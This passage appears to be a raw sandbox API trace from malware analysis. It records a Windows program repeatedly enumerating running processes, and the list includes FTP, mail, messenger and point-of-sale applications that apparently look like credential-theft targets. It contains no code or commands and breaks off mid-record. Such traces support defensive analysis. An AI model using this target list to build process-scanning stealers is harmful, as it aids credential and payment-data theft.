cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0298.644] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0298.646] CloseHandle (hObject=0x227c) returned 1 [0298.646] Sleep (dwMilliseconds=0x64) [0298.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0298.801] Process32First (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.803] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.804] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.806] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.808] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.811] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.813] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.814] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.816] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.818] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.819] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.821] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.822] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.829] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.831] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.832] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.834] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.836] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.838] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.890] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.892] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0298.894] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0298.896] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.897] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.899] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0298.904] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0298.905] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0298.907] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0298.909] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.911] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.913] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0298.914] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.916] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0298.920] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0298.922] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0298.923] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0298.925] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0298.927] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0298.928] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0298.930] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0298.931] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0298.954] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0298.956] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0298.957] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0298.959] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0298.961] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0298.967] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0298.968] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0298.970] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0298.972] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0298.973] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0298.975] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0298.977] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0298.978] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0298.983] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0298.984] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0298.986] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0298.988] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0298.990] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0298.991] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0298.993] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0299.063] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0299.065] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0299.067] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0299.070] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0299.072] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0299.079] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0299.082] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0299.085] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0299.087] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0299.089] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0299.093] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0299.095] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0299.097] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0299.099] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0299.100] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0299.102] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0299.104] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0299.130] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0299.132] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0299.134] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0299.138] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0299.141] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, 